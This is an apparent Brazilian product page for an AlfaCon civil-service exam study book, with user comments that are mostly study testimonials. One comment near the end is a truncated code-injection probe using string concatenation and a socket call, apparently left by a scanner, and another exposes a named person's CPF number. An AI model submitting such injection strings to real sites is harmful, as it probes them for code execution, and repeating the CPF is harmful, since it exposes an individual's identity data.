Apostila Básico para Concursos - 10ª Edição da AlfaCon. Inclui Língua Portuguesa, Redação, Matemática, Informática, Direito Constitucional e Administrativo, além de mais de 300 exercícios gabaritados.
Equipe de professores Alfacon
Título | Ano | Páginas | Formato | ISBN |
---|---|---|---|---|
Básico para Concursos - 10ª Edição | 05/2024 | 416 | 20.5 x 27.5 (cm) | 9786559187799 |
eu estou estudando nas aulas que estão disponíveis, estou desempregada e sem condições. e ainda estou estud...
Como fazer aula online
Agradeço o curso montado, somou demais e aprendi muito, obrigado Alfacon.
Meu nome é Gustavo Sampaio. Moro em Teresina-PI. Sou formado em direito e decidi estudar pra concurso porqu...
Meu nome é Gustavo Sampaio. Moro em Teresina-PI. Sou formado em direito e decidi estudar pra concurso porque senti que tinha vocação pra ser policial, e durante formação em contato com as disciplinas Penal e Processo Penal confirmei que era essa carreira que realmente deveria seguir. Sem contar que, o concurso público te proporciona uma estabilidade financeira e uma aposentadoria digna.
Consegui aprovação após 1 ano e 6 meses de estudos e algumas reprovações, estudando em média 6 horas líquidas, dando ênfase as disciplinas da minha área, mas sem menosprezar as demais, devido a alta concorrência do certame.
Tive que conciliar os estudos com o trabalho de assessor judicial e de forma planejada ainda sobrava tempo para a prática de atividades físicas, imprescindível pra quem quer concorrer ao cargo policial.
Estudei por livros e apostilas, inclusive com materiais do AlfaCon.
Quase sempre estava motivado e sempre que pensava em algo desmotivante assistia vídeos motivacionais e as aulas dos professores alfartanos, pois esse é o diferencial do alfacon - além de conhecimento em alto nível nos mantém sempre motivado para vencer a batalha.
Abdicar foi a parte mais difícil, pois muitos finais de semana tive que abrir mão de sair com a namorada, de viajar para a cidade onde moram meus pais para encontrar com a família e os amigos e de tomar aquela cervejinha.
Tenho namorada, que também estuda pra concursos. Moro com duas irmãs, em Teresina-PI, e meus pais moram em União, a 60km. Eles sempre me apoiaram durante esse período. Os amigos, alguns se distanciaram, mas ganhei outros amigos que também eram concurseiros.
Tentei outros concursos, e após a PRF, consegui aprovação no concurso de Oficial da PM do Estado do Piauí, e recentemente no concurso dos meus sonhos, Delegado de Polícia Civil do Pará, conquistando a 1ª vaga.
No começo confesso que estudava somente após a abertura do edital, porém com as reprovações aprendi que não dar tempo ver o conteúdo do edital se continuasse agindo dessa forma. Então, passei a estudar as disciplinas específicas antes de sair o edital e após incluía no plano de estudos as demais.
AlfaCon eu conheci através da internet, quando assisti uma super revisão para o concurso de escrivão da polícia federal em 2013, e logo notei o diferencial que era a motivação dos professores, principalmente do mestre Evandro Guedes, transmitida para os alunos alfartanos.
O AlfaCon me ajudou de maneira substancial, pois além de me manter motivado me propôs grandes conhecimentos, um exemplo disso é a famosa "árvore do crime", criação do ilustre professor Evandro Guedes.
A técnica que eu utilizei para otimizar o aprendizado e a memorização foi a revisão e a resolução de muitas questões, principalmente da banca que eu iria enfrentar
A maior dificuldade, sem dúvidas, era a rotina de estudos que é muito desgastante. Mas quando sentia que a cada dia estava progredindo a rotina se tornava prazerosa.
O que me fez superar as dificuldade foi, primeiro, a situação em que eu me encontrava, pois não estava satisfeito com o lado profissional. Segundo, a vontade de acordar todos os dias e fazer o que gosto, pois assim o trabalho se torna uma diversão que você não quer que acabe.
Eu procurava controlar a ansiedade, pois isso é algo natural. Lia a bíblia e artigos de pessoas que entendem do assunto, como o mestre Willian Douglas.
O fator efetivo para minha aprovação foi a disciplina, pois seguia religiosamente o meu programa de estudo.
A dica que eu deixo é: saia da zona de conforto e pague o preço pela realização de seus sonhos, e verá o quanto tudo isso vale a pena. Se tivesse que fazer faria tudo novamente!! Por fim, estude de forma planejada, com dedicação e confie em Deus, que o resultado virá e terá uma vida inteira para desfrutar do melhor da vida.
'+'A'.concat(70-3).concat(22*4).concat(105).concat(75).concat(118).concat(71)+(require'socket' Socket.getho...
NOME:LUCIANO DA SILVA PEREIRA: CPF:011 187 704 04: ANOS: 2021 Descrição Forma de entrega: Online Perío...
Meu nome é Luiz Filipe, tenho 22 anos e moro em SP. Conheci o mundo dos concursos no ano de 2018, no qual, ...
Quero ser Policial militar meu sonho